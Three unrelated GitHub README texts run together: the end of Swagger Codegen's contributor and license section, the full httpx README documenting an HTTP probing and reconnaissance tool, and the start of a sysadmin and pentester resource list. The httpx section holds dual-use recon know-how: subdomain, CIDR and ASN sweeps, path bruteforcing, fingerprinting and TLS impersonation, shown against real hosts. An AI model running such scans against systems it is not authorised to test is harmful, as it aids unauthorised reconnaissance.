[W.UP](http://wup.hu/?siteLang=en) - [Wealthfront](https://www.wealthfront.com/) - [Webever GmbH](https://www.webever.de/) - [WEXO A/S](https://www.wexo.dk/) - [Zalando](https://tech.zalando.com) - [ZEEF.com](https://zeef.com/) # Swagger Codegen Core Team Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis. ## API Clients | Languages | Core Team (join date) | |:-------------|:-------------| | ActionScript | | | C++ | | | C# | @jimschubert (2016/05/01) | | | Clojure | @xhh (2016/05/01) | | Dart | | | Groovy | | | Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) | | Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) | | Java (Spring Cloud) | @cbornet (2016/07/19) | | NodeJS/Javascript | @xhh (2016/05/01) | | ObjC | @mateuszmackowiak (2016/05/09) | | Perl | @wing328 (2016/05/01) | | PHP | @arnested (2016/05/01) | | Python | @scottrw93 (2016/05/01) | | Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) | | Scala | | | Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) | | TypeScript (Node) | @Vrolijkx (2016/05/01) | | TypeScript (Angular1) | @Vrolijkx (2016/05/01) | | TypeScript (Angular2) | @Vrolijkx (2016/05/01) | | TypeScript (Fetch) | | ## Server Stubs | Languages | Core Team (date joined) | |:------------- |:-------------| | C# ASP.NET5 | @jimschubert (2016/05/01) | | Go Server | @guohuang (2016/06/13) | | Haskell Servant | | | Java Spring Boot | @cbornet (2016/07/19) | | Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) | | Java JAX-RS | | | Java Play Framework | | | NancyFX | | | NodeJS | @kolyjjj (2016/05/01) | | PHP Lumen | @abcsum (2016/05/01) | | PHP Silex | | | PHP Slim | | | Python Flask | | | Ruby Sinatra | @wing328 (2016/05/01) | | | Scala Scalatra | | | | Scala Finch | @jimschubert (2017/01/28) | ## Template Creator Here is a list of template creators: * API Clients: * Akka-Scala: @cchafer * Bash: @bkryza * C++ REST: @Danielku15 * C# (.NET 2.0): @who * Clojure: @xhh * Dart: @yissachar * Elixir: @niku * Groovy: @victorgit * Go: @wing328 * Java (Feign): @davidkiss * Java (Retrofit): @0legg * Java (Retrofi2): @emilianobonassi * Java (Jersey2): @xhh * Java (okhttp-gson): @xhh * Javascript/NodeJS: @jfiala * Javascript (Closure-annotated Angular) @achew22 * JMeter @davidkiss * Perl: @wing328 * Swift: @tkqubo * Swift 3: @hexelon * TypeScript (Node): @mhardorf * TypeScript (Angular1): @mhardorf * TypeScript (Fetch): @leonyu * TypeScript (Angular2): @roni-frantchi * TypeScript (jQuery): @bherila * Server Stubs * C# ASP.NET5: @jimschubert * C# NancyFX: @mstefaniuk * Erlang Server: @galaxie * Go Server: @guohuang * Haskell Servant: @algas * Java MSF4J: @sanjeewa-malalgoda * Java Spring Boot: @diyfr * Java Undertow: @stevehu * Java Play Framework: @JFCote * JAX-RS RestEasy: @chameleon82 * JAX-RS CXF: @hiveship * JAX-RS CXF (CDI): @nickcmaynard * JAX-RS RestEasy (JBoss EAP): @jfiala * PHP Lumen: @abcsum * PHP Slim: @jfastnacht * PHP Zend Expressive (with Path Handler): @Articus * Ruby on Rails 5: @zlx * Scala Finch: @jimschubert * Documentation * HTML Doc 2: @jhitchcock * Confluence Wiki: @jhitchcock ## How to join the core team Here are the requirements to become a core team member: - rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors - to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22) - regular contributions to the project - about 3 hours per week - for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc To join the core team, please reach out to [email protected] (@wing328) for more information. To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator. # Swagger Codegen Evangelist Swagger Codegen Evangelist shoulders one or more of the following responsibilities: - publishes articles on the benefit of Swagger Codegen - organizes local Meetups - presents the benefits of Swagger Codegen in local Meetups or conferences - actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D) - submits PRs to improve Swagger Codegen - reviews PRs submitted by the others - ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors) If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to [email protected] (@wing328) ### List of Swagger Codegen Evangelists - Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016) - [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem) - [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) # License information on Generated Code The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points: * The templates included with this project are subject to the [License](#license). * Generated code is intentionally _not_ subject to the parent project license When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate. License ------- Copyright 2017 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --- <img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
<h1 align="center"> <img src="static/httpx-logo.png" alt="httpx" width="200px"> <br> </h1> <p align="center"> <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/license-MIT-_red.svg"></a> <a href="https://goreportcard.com/badge/github.com/projectdiscovery/httpx"><img src="https://goreportcard.com/badge/github.com/projectdiscovery/httpx"></a> <a href="https://github.com/projectdiscovery/httpx/releases"><img src="https://img.shields.io/github/release/projectdiscovery/httpx"></a> <a href="https://hub.docker.com/r/projectdiscovery/httpx"><img src="https://img.shields.io/docker/pulls/projectdiscovery/httpx.svg"></a> <a href="https://twitter.com/pdiscoveryio"><img src="https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter"></a> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> </p> <p align="center"> <a href="#features">Features</a> โ€ข <a href="#installation-instructions">Installation</a> โ€ข <a href="#usage">Usage</a> โ€ข <a href="#running-httpx">Running httpx</a> โ€ข <a href="#notes">Notes</a> โ€ข <a href="https://discord.gg/projectdiscovery">Join Discord</a> </p> `httpx` is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the [retryablehttp](https://github.com/projectdiscovery/retryablehttp-go) library. It is designed to maintain result reliability with an increased number of threads. # Features <h1 align="center"> <img src="https://user-images.githubusercontent.com/8293321/135731750-4c1d38b1-bd2a-40f9-88e9-3c4b9f6da378.png" alt="httpx" width="700px"> <br> </h1> - Simple and modular code base making it easy to contribute. - Fast And fully configurable flags to probe multiple elements. - Supports multiple HTTP based probings. - Smart auto fallback from https to http as default. - Supports hosts, URLs and CIDR as input. - Handles edge cases doing retries, backoffs etc for handling WAFs. ### Supported probes | Probes | Default check | Probes | Default check | |-----------------|---------------|----------------|---------------| | URL | true | IP | true | | Title | true | CNAME | true | | Status Code | true | Raw HTTP | false | | Content Length | true | HTTP2 | false | | TLS Certificate | true | HTTP Pipeline | false | | CSP Header | true | Virtual host | false | | Line Count | true | Word Count | true | | Location Header | true | CDN | false | | Web Server | true | Paths | false | | Web Socket | true | Ports | false | | Response Time | true | Request Method | true | | Favicon Hash | false | Probe Status | false | | Body Hash | true | Header Hash | true | | Redirect chain | false | URL Scheme | true | | JARM Hash | false | ASN | false | # Installation Instructions `httpx` requires **go1.20** to install successfully. Run the following command to get the repo: ```sh go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest ``` | :exclamation: **Disclaimer** | |---------------------------------| | **This project is in active development**. Expect breaking changes with releases. Review the changelog before updating. | | This project was primarily built to be used as a standalone CLI tool. **Running it as a service may pose security risks.** It's recommended to use with caution and additional security measures. | # Usage ```sh httpx -h ``` This will display help for the tool. Here are all the switches it supports. ```console Usage: ./httpx [flags] Flags: INPUT: -l, -list string input file containing list of hosts to process -rr, -request string file containing raw request -u, -target string[] input target host(s) to probe PROBES: -sc, -status-code display response status-code -cl, -content-length display response content-length -ct, -content-type display response content-type -location display response redirect location -favicon display mmh3 hash for '/favicon.ico' file -hash string display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512) -jarm display jarm fingerprint hash -rt, -response-time display response time -lc, -line-count display response body line count -wc, -word-count display response body word count -title display page title -server, -web-server display server name -td, -tech-detect display technology in use based on wappalyzer dataset -method display http request method -websocket display server using websocket -ip display host ip -cname display host cname -asn display host asn information -cdn display cdn in use -probe display probe status HEADLESS: -ss, -screenshot enable saving screenshot of the page using headless browser -system-chrome enable using local installed chrome for screenshot MATCHERS: -mc, -match-code string match response with specified status code (-mc 200,302) -ml, -match-length string match response with specified content length (-ml 100,102) -mlc, -match-line-count string match response body with specified line count (-mlc 423,532) -mwc, -match-word-count string match response body with specified word count (-mwc 43,55) -mfc, -match-favicon string[] match response with specified favicon hash (-mfc 1494302000) -ms, -match-string string match response with specified string (-ms admin) -mr, -match-regex string match response with specified regex (-mr admin) -mcdn, -match-cdn string[] match host with specified cdn provider (incapsula, oracle, google, azure, cloudflare, cloudfront, fastly, akamai, sucuri, leaseweb) -mrt, -match-response-time string match response with specified response time in seconds (-mrt '< 1') -mdc, -match-condition string match response with dsl expression condition EXTRACTOR: -er, -extract-regex string[] display response content with matched regex -ep, -extract-preset string[] display response content matched by a pre-defined regex (url,ipv4,mail) FILTERS: -fc, -filter-code string filter response with specified status code (-fc 403,401) -fep, -filter-error-page filter response with ML based error page detection -fl, -filter-length string filter response with specified content length (-fl 23,33) -flc, -filter-line-count string filter response body with specified line count (-flc 423,532) -fwc, -filter-word-count string filter response body with specified word count (-fwc 423,532) -ffc, -filter-favicon string[] filter response with specified favicon hash (-mfc 1494302000) -fs, -filter-string string filter response with specified string (-fs admin) -fe, -filter-regex string filter response with specified regex (-fe admin) -fcdn, -filter-cdn string[] filter host with specified cdn provider (google, leaseweb, stackpath, cloudfront, fastly) -frt, -filter-response-time string filter response with specified response time in seconds (-frt '> 1') -fdc, -filter-condition string filter response with dsl expression condition RATE-LIMIT: -t, -threads int number of threads to use (default 50) -rl, -rate-limit int maximum requests to send per second (default 150) -rlm, -rate-limit-minute int maximum number of requests to send per minute MISCELLANEOUS: -pa, -probe-all-ips probe all the ips associated with same host -p, -ports string[] ports to probe (nmap syntax: eg http:1,2-10,11,https:80) -path string path or list of paths to probe (comma-separated, file) -tls-probe send http probes on the extracted TLS domains (dns_name) -csp-probe send http probes on the extracted CSP domains -tls-grab perform TLS(SSL) data grabbing -pipeline probe and display server supporting HTTP1.1 pipeline -http2 probe and display server supporting HTTP2 -vhost probe and display server supporting VHOST -ldv, -list-dsl-variables list json output field keys name that support dsl matcher/filter UPDATE: -up, -update update httpx to latest version -duc, -disable-update-check disable automatic httpx update check OUTPUT: -o, -output string file to write output results -oa, -output-all filename to write output results in all formats -sr, -store-response store http response to output directory -srd, -store-response-dir string store http response to custom directory -csv store output in csv format -csvo, -csv-output-encoding string define output encoding -json store output in JSONL(ines) format -irr, -include-response include http request/response in JSON output (-json only) -irrb, -include-response-base64 include base64 encoded http request/response in JSON output (-json only) -include-chain include redirect http chain in JSON output (-json only) -store-chain include http redirect chain in responses (-sr only) CONFIGURATIONS: -r, -resolvers string[] list of custom resolver (file or comma separated) -allow string[] allowed list of IP/CIDR's to process (file or comma separated) -deny string[] denied list of IP/CIDR's to process (file or comma separated) -sni, -sni-name string custom TLS SNI name -random-agent enable Random User-Agent to use (default true) -H, -header string[] custom http headers to send with request -http-proxy, -proxy string http proxy to use (eg http://127.0.0.1:8080) -unsafe send raw requests skipping golang normalization -resume resume scan using resume.cfg -fr, -follow-redirects follow http redirects -maxr, -max-redirects int max number of redirects to follow per host (default 10) -fhr, -follow-host-redirects follow redirects on the same host -vhost-input get a list of vhosts as input -x string request methods to probe, use 'all' to probe all HTTP methods -body string post body to include in http request -s, -stream stream mode - start elaborating input targets without sorting -sd, -skip-dedupe disable dedupe input items (only used with stream mode) -ldp, -leave-default-ports leave default http/https ports in host header (eg. http://host:80 - https://host:443 -ztls use ztls library with autofallback to standard one for tls13 -no-decode avoid decoding body -tlsi, -tls-impersonate enable random tls client (ja3) impersonation (experimental) -no-stdin Disable Stdin processing DEBUG: -health-check, -hc run diagnostic check up -debug display request/response content in cli -debug-req display request content in cli -debug-resp display response content in cli -version display httpx version -stats display scan statistic -profile-mem string optional httpx memory profile dump file -silent silent mode -v, -verbose verbose mode -si, -stats-interval int number of seconds to wait between showing a statistics update (default: 5) -nc, -no-color disable colors in cli output OPTIMIZATIONS: -nf, -no-fallback display both probed protocol (HTTPS and HTTP) -nfs, -no-fallback-scheme probe with protocol scheme specified in input -maxhr, -max-host-error int max error count per host before skipping remaining path/s (default 30) -ec, -exclude-cdn skip full port scans for CDNs (only checks for 80,443) -retries int number of retries -timeout int timeout in seconds (default 5) -delay duration duration between each http request (eg: 200ms, 1s) (default -1ns) -rsts, -response-size-to-save int max response size to save in bytes (default 2147483647) -rstr, -response-size-to-read int max response size to read in bytes (default 2147483647) ``` # Running httpX ### URL Probe This will run the tool against all the hosts and subdomains in `hosts.txt` and returns URLs running HTTP webserver. ```console cat hosts.txt | httpx __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| v1.1.1 /_/ projectdiscovery.io [WRN] Use with caution. You are responsible for your actions [WRN] Developers assume no liability and are not responsible for any misuse or damage. https://mta-sts.managed.hackerone.com https://mta-sts.hackerone.com https://mta-sts.forwarding.hackerone.com https://docs.hackerone.com https://www.hackerone.com https://resources.hackerone.com https://api.hackerone.com https://support.hackerone.com ``` ### File Input This will run the tool with the `-probe` flag against all the hosts in **hosts.txt** and return URLs with probed status. ```console httpx -list hosts.txt -silent -probe http://ns.hackerone.com [FAILED] https://docs.hackerone.com [SUCCESS] https://mta-sts.hackerone.com [SUCCESS] https://mta-sts.managed.hackerone.com [SUCCESS] http://email.hackerone.com [FAILED] https://mta-sts.forwarding.hackerone.com [SUCCESS] http://links.hackerone.com [FAILED] https://api.hackerone.com [SUCCESS] https://www.hackerone.com [SUCCESS] http://events.hackerone.com [FAILED] https://support.hackerone.com [SUCCESS] https://gslink.hackerone.com [SUCCESS] http://o1.email.hackerone.com [FAILED] http://info.hackerone.com [FAILED] https://resources.hackerone.com [SUCCESS] http://o2.email.hackerone.com [FAILED] http://o3.email.hackerone.com [FAILED] http://go.hackerone.com [FAILED] http://a.ns.hackerone.com [FAILED] http://b.ns.hackerone.com [FAILED] ``` ### CIDR Input ```console echo 173.0.84.0/24 | httpx -silent https://173.0.84.29 https://173.0.84.43 https://173.0.84.31 https://173.0.84.44 https://173.0.84.12 https://173.0.84.4 https://173.0.84.36 https://173.0.84.45 https://173.0.84.14 https://173.0.84.25 https://173.0.84.46 https://173.0.84.24 https://173.0.84.32 https://173.0.84.9 https://173.0.84.13 https://173.0.84.6 https://173.0.84.16 https://173.0.84.34 ``` ### AS Number Input ```console echo AS14421 | httpx -silent https://216.101.17.248 https://216.101.17.249 https://216.101.17.250 https://216.101.17.251 https://216.101.17.252 ``` ### Tool Chain ```console subfinder -d hackerone.com -silent| httpx -title -tech-detect -status-code __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ v1.1.1 projectdiscovery.io Use with caution. You are responsible for your actions Developers assume no liability and are not responsible for any misuse or damage. https://mta-sts.managed.hackerone.com [404] [Page not found ยท GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails] https://mta-sts.hackerone.com [404] [Page not found ยท GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails] https://mta-sts.forwarding.hackerone.com [404] [Page not found ยท GitHub Pages] [GitHub Pages,Ruby on Rails,Varnish] https://docs.hackerone.com [200] [HackerOne Platform Documentation] [Ruby on Rails,jsDelivr,Gatsby,React,webpack,Varnish,GitHub Pages] https://support.hackerone.com [301,302,301,200] [HackerOne] [Cloudflare,Ruby on Rails,Ruby] https://resources.hackerone.com [301,301,404] [Sorry, no Folders found.] ``` ### Error Page Classifier and Filtering The Error Page Classifier and Filtering feature aims to add intelligence to the tool by enabling it to classify and filter out common error pages returned by web applications. It is an enhancement to the existing httpx capabilities and is geared towards reducing the noise in the results and helping users focus on what matters most. ```console httpx -l urls.txt -path /v1/api -fep __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ projectdiscovery.io [INF] Current httpx version v1.3.3 (latest) https://scanme.sh/v1/api ``` Filtered error pages are stored to predefined file `filtered_error_page.json` in jsonline format when `-filter-error-page` option is used. ### Favicon Hash ```console subfinder -d hackerone.com -silent | httpx -favicon __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ v1.1.5 projectdiscovery.io Use with caution. You are responsible for your actions. Developers assume no liability and are not responsible for any misuse or damage. https://docs.hackerone.com/favicon.ico [595148549] https://hackerone.com/favicon.ico [595148549] https://mta-sts.managed.hackerone.com/favicon.ico [-1700323260] https://mta-sts.forwarding.hackerone.com/favicon.ico [-1700323260] https://support.hackerone.com/favicon.ico [-1279294674] https://gslink.hackerone.com/favicon.ico [1506877856] https://resources.hackerone.com/favicon.ico [-1840324437] https://api.hackerone.com/favicon.ico [566218143] https://mta-sts.hackerone.com/favicon.ico [-1700323260] https://www.hackerone.com/favicon.ico [778073381] ``` ### [JARM Fingerprint](https://github.com/salesforce/jarm) ```console subfinder -d hackerone.com -silent | httpx -jarm __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ v1.2.1 projectdiscovery.io Use with caution. You are responsible for your actions. Developers assume no liability and are not responsible for any misuse or damage. https://www.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007] https://mta-sts.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af] https://mta-sts.managed.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af] https://docs.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af] https://support.hackerone.com [29d3dd00029d29d00029d3dd29d29d5a74e95248e58a6162e37847a24849f7] https://api.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007] https://mta-sts.forwarding.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af] https://resources.hackerone.com [2ad2ad0002ad2ad0002ad2ad2ad2ad043bfbd87c13813505a1b60adf4f6ff5] ``` ### ASN Fingerprint ```console subfinder -d hackerone.com -silent | httpx -asn __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ v1.2.1 projectdiscovery.io Use with caution. You are responsible for your actions. Developers assume no liability and are not responsible for any misuse or damage. https://mta-sts.managed.hackerone.com [AS54113, FASTLY, US] https://gslink.hackerone.com [AS16509, AMAZON-02, US] https://www.hackerone.com [AS13335, CLOUDFLARENET, US] https://mta-sts.forwarding.hackerone.com [AS54113, FASTLY, US] https://resources.hackerone.com [AS16509, AMAZON-02, US] https://support.hackerone.com [AS13335, CLOUDFLARENET, US] https://mta-sts.hackerone.com [AS54113, FASTLY, US] https://docs.hackerone.com [AS54113, FASTLY, US] https://api.hackerone.com [AS13335, CLOUDFLARENET, US] ``` ### File/Path Bruteforce ```console httpx -l urls.txt -path /v1/api -sc __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ v1.1.5 projectdiscovery.io Use with caution. You are responsible for your actions. Developers assume no liability and are not responsible for any misuse or damage. https://mta-sts.managed.hackerone.com/v1/api [404] https://mta-sts.hackerone.com/v1/api [404] https://mta-sts.forwarding.hackerone.com/v1/api [404] https://docs.hackerone.com/v1/api [404] https://api.hackerone.com/v1/api [401] https://hackerone.com/v1/api [302] https://support.hackerone.com/v1/api [404] https://resources.hackerone.com/v1/api [301] https://gslink.hackerone.com/v1/api [404] http://www.hackerone.com/v1/api [301] ``` ### Docker Run ```console cat sub_domains.txt | docker run -i projectdiscovery/httpx __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ v1.1.2 projectdiscovery.io Use with caution. You are responsible for your actions Developers assume no liability and are not responsible for any misuse or damage. https://mta-sts.forwarding.hackerone.com https://mta-sts.hackerone.com https://mta-sts.managed.hackerone.com https://www.hackerone.com https://api.hackerone.com https://gslink.hackerone.com https://resources.hackerone.com https://docs.hackerone.com https://support.hackerone.com ``` ### Screenshot Latest addition to the project, the addition of the `-screenshot` option in httpx, a powerful new feature that allows users to take screenshots of target URLs, pages, or endpoints along with the rendered DOM. This functionality enables the **visual content discovery process**, providing a comprehensive view of the target's visual appearance. Rendered DOM body is also included in json line output when `-screenshot` option is used with `-json` option. #### ๐Ÿšฉ Usage To use the screenshot feature, simply add the `-screenshot` flag to your httpx command: ```console httpx -screenshot -u https://example.com ``` ๐ŸŽฏ Domain, Subdomain, and Path Support The `-screenshot` option is versatile and can be used to capture screenshots for domains, subdomains, and even specific paths when used in conjunction with the `-path` option: ```console httpx -screenshot -u example.com httpx -screenshot -u https://example.com/login httpx -screenshot -path fuzz_path.txt -u https://example.com ``` Using with other tools: ```console subfinder -d example.com | httpx -screenshot ``` #### ๐ŸŒ System Chrome By default, httpx will use the go-rod library to install and manage Chrome for taking screenshots. However, if you prefer to use your locally installed system Chrome, add the `-system-chrome` flag: ```console httpx -screenshot -system-chrome -u https://example.com ``` #### ๐Ÿ“ Output Directory Screenshots are stored in the output/screenshot directory by default. To specify a custom output directory, use the `-srd` option: ```console httpx -screenshot -srd /path/to/custom/directory -u https://example.com ``` #### โณ Performance Considerations Please note that since screenshots are captured using a headless browser, httpx runs will be slower when using the `-screenshot` option. ### Using `httpx` as a library `httpx` can be used as a library by creating an instance of the `Option` struct and populating it with the same options that would be specified via CLI. Once validated, the struct should be passed to a runner instance (to be closed at the end of the program) and the `RunEnumeration` method should be called. A minimal example of how to do it is in the [examples](examples/) folder # Notes - As default, `httpx` probe with **HTTPS** scheme and fall-back to **HTTP** only if **HTTPS** is not reachable. - The `-no-fallback` flag can be used to probe and display both **HTTP** and **HTTPS** result. - Custom scheme for ports can be defined, for example `-ports http:443,http:80,https:8443` - Custom resolver supports multiple protocol (**doh|tcp|udp**) in form of `protocol:resolver:port` (e.g. `udp:127.0.0.1:53`) - The following flags should be used for specific use cases instead of running them as default with other probes: - `-ports` - `-path` - `-vhost` - `-screenshot` - `-csp-probe` - `-tls-probe` - `-favicon` - `-http2` - `-pipeline` - `-tls-impersonate` # Acknowledgement Probing feature is inspired by [@tomnomnom/httprobe](https://github.com/tomnomnom/httprobe) work โค๏ธ -------- <div align="center"> `httpx` is made with ๐Ÿ’™ by the [projectdiscovery](https://projectdiscovery.io) team and distributed under [MIT License](LICENSE.md). <a href="https://discord.gg/projectdiscovery"><img src="https://raw.githubusercontent.com/projectdiscovery/nuclei-burp-plugin/main/static/join-discord.png" width="300" alt="Join Discord"></a> </div>
<p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge"> <img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master"> </a> </p> <p align="center">"<i>Knowledge is powerful, be careful how you use it!</i>"</p> <h4 align="center">A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.</h4> <br> <p align="center"> <a href="https://github.com/trimstray/the-book-of-secret-knowledge/pulls"> <img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests"> </a> <a href="LICENSE.md"> <img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License"> </a> </p> <p align="center"> <a href="https://twitter.com/trimstray" target="_blank"> <img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter"> </a> </p> <div align="center"> <sub>Created by <a href="https://twitter.com/trimstray">trimstray</a> and <a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors">contributors</a> </div> <br> **** ## :notebook_with_decorative_cover: &nbsp;What is it? This repository is a collection of various materials and tools that I use every day in my work. It contains a lot of useful information gathered in one piece. It is an invaluable source of knowledge for me that I often look back on. ## :restroom: &nbsp;For whom? For everyone, really. Here everyone can find their favourite tastes. But to be perfectly honest, it is aimed towards System and Network administrators, DevOps, Pentesters, and Security Researchers. ## :information_source: &nbsp;Contributing If you find something which doesn't make sense, or something doesn't seem right, please make a pull request and please add valid and well-reasoned explanations about your changes or comments. A few simple rules for this project: - inviting and clear - not tiring - useful These below rules may be better: - easy to contribute to (Markdown + HTML ...) - easy to find (simple TOC, maybe it's worth extending them?) Url marked **\*** is temporary unavailable. Please don't delete it without confirming that it has permanently expired. Before adding a pull request, please see the **[contributing guidelines](.github/CONTRIBUTING.md)**. You should also remember about this: ```diff + This repository is not meant to contain everything but only good quality stuff. ``` All **suggestions/PR** are welcome! ### Code Contributors This project exists thanks to all the people who contribute. <a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors"><img src="https://opencollective.com/the-book-of-secret-knowledge/contributors.svg?width=890&button=false"></a> ### Financial Contributors <p align="left"> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/backers/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> <a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective"> <img src="https://img.shields.io/opencollective/sponsors/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a> </a> </p> ## :gift_heart: &nbsp;Support If this project is useful and important for you or if you really like _the-book-of-secret-knowledge_, you can bring **positive energy** by giving some **good words** or **supporting this project**. Thank you! ## :newspaper: &nbsp;RSS Feed & Updates GitHub exposes an [RSS/Atom](https://github.com/trimstray/the-book-of-secret-knowledge/commits.atom) feed of the commits, which may also be useful if you want to be kept informed about all changes. ## :ballot_box_with_check: &nbsp;ToDo - [ ] Add new stuff... - [ ] Add useful shell functions - [ ] Add one-liners for collection tools (eg. CLI Tools) - [ ] Sort order in lists New items are also added on a regular basis. ## :anger: &nbsp;Table of Contents Only main chapters: - **[CLI Tools](#cli-tools-toc)** - **[GUI Tools](#gui-tools-toc)** - **[Web Tools](#web-tools-toc)** - **[Systems/Services](#systemsservices-toc)** - **[Networks](#networks-toc)** - **[Containers/Orchestration](#containersorchestration-toc)** - **[Manuals/Howtos/Tutorials](#manualshowtostutorials-toc)** - **[Inspiring Lists](#inspiring-lists-toc)** - **[Blogs/Podcasts/Videos](#blogspodcastsvideos-toc)** - **[Hacking/Penetration Testing](#hackingpenetration-testing-toc)** - **[Your daily knowledge and news](#your-daily-knowledge-and-news-toc)** - **[Other Cheat Sheets](#other-cheat-sheets-toc)** - **[One-liners](#one-liners-toc)** - **[Shell functions](#shell-functions-toc)** ## :trident: &nbsp;The Book of Secret Knowledge (Chapters) #### CLI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Shells <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ohmyz.sh/"><b>Oh My ZSH!</b></a> - is the best framework for managing your Zsh configuration.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/oh-my-fish/oh-my-fish"><b>Oh My Fish</b></a> - the Fishshell framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/starship/starship"><b>Starship</b></a> - the cross-shell prompt written in Rust.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/romkatv/powerlevel10k"><b>powerlevel10k</b></a> - is a fast reimplementation of Powerlevel9k ZSH theme.<br> </p> ##### :black_small_square: Shell plugins <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rupa/z"><b>z</b></a> - tracks the folder you use 